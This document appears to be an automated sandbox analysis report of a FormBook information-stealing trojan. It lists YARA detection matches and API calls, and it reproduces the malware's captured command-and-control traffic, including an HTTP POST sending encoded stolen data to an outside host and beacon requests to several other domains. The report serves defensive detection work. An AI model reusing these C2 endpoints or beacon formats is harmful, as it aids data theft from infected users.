          Source: help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: help.exe, 00000005.00000002.569622242.0000000003B28000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.lyonfinancialusa.com/henz/?4hq=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs
          Source: unknownHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.lyonfinancialusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lyonfinancialusa.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 46 5f 54 33 34 4d 43 59 37 4c 4c 6c 35 30 36 46 70 55 6d 45 4c 6d 56 30 6d 31 6d 41 7e 59 47 31 45 72 5a 72 7a 51 72 43 4f 57 4d 4c 57 30 50 39 66 6d 38 71 30 51 56 44 6d 5a 39 4b 58 4c 58 59 43 47 67 65 67 44 28 54 4b 77 71 30 79 6a 6f 58 48 68 65 62 75 32 37 65 5a 42 62 45 69 45 6b 62 33 42 53 6a 35 64 4f 6e 57 42 38 78 4b 44 71 48 63 52 32 4b 48 38 32 37 68 43 41 6c 51 79 65 4e 57 59 50 55 32 4c 59 59 6e 75 74 6f 58 35 49 43 7a 65 73 58 73 41 4b 7a 4d 4c 79 53 41 5f 6b 2d 4b 4d 30 4f 32 5f 38 30 57 4c 61 6b 52 4f 65 51 4c 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=F_T34MCY7LLl506FpUmELmV0m1mA~YG1ErZrzQrCOWMLW0P9fm8q0QVDmZ9KXLXYCGgegD(TKwq0yjoXHhebu27eZBbEiEkb3BSj5dOnWB8xKDqHcR2KH827hCAlQyeNWYPU2LYYnutoX5ICzesXsAKzMLySA_k-KM0O2_80WLakROeQLw).
          Source: unknownDNS traffic detected: queries for: www.eufidelizo.com
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0flOUm4qON1Jqzg==&o8=wR-h28Gxg HTTP/1.1Host: www.eufidelizo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs75pfZv/CVEdhBuwKxvuqF4TRlzEsULWUGP1g0EPzg==&o8=wR-h28Gxg HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=8TptbrIX6F4NxrWdTDNRTBReo0fMEuELv5cUeaX5N5UPFd9Hxy/eTVHt8QapNK2qZdoBzpjQ3MhBnX7XpU/EbwlnLs/kdjkkcQ==&o8=wR-h28Gxg HTTP/1.1Host: www.afterdarksocial.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYcUTUl/8YIp7EDwQ==&o8=wR-h28Gxg HTTP/1.1Host: www.patrickguarte.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=P4ST2IJPckjMYpRf2FLdq0axEROKy7OOggEf6mHPhnME1yGBMW0egmkxYDI06dmXm7z7OVgXWzJ+YqSrULYkiycbwQA+qKMVmQ==&o8=wR-h28Gxg HTTP/1.1Host: www.brennancorps.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=dpH6BKfQQ0cm5Imeo72RAP4DEbjLNfLp0vSyI4bn1RZjePkdeS9augOMgWVykt+ztx1R3MJW/gsn5nuFARzMtUktTfqb4tJ3+A==&o8=wR-h28Gxg HTTP/1.1Host: www.lopezmodeling.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=jIhXpQA4pSG2yYWBb37zpp/PG+nmQ9F5uiLrR0YNz1ez7r/FQUV2GqKIrgsyQUbvld7C5UuQUlYsY6nmozac85OtAKDr0AUC2A==&o8=wR-h28Gxg HTTP/1.1Host: www.foxwhistle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_004050C0 OpenClipboard,GetClipboardData,GlobalLock,GlobalSize,VkKeyScanW,MapVirtualKeyW,GlobalUnlock,CloseClipboard,1_2_004050C0
          Source: Lc8xQv8iZY.exe, 00000000.00000002.312089969.00000000006BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_00404020 GetKeyboardState,1_2_00404020
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_00405125 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405125

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: hvbvmxm.exe PID: 5420, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: help.exe PID: 1900, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Lc8xQv8iZY.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: hvbvmxm.exe PID: 5420, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: help.exe PID: 1900, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040324F
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_004063330_2_00406333
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_004049360_2_00404936
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_004168DD1_2_004168DD
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040B5041_2_0040B504
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040C24D1_2_0040C24D
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040BA001_2_0040BA00
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040BE181_2_0040BE18
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040C6821_2_0040C682
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_00B802271_2_00B80227
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_00B804D11_2_00B804D1
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_004012B03_2_004012B0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0042193D3_2_0042193D
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_004212843_2_00421284
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_004012A43_2_004012A4
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0040B4533_2_0040B453
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0040B4573_2_0040B457
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_004224293_2_00422429
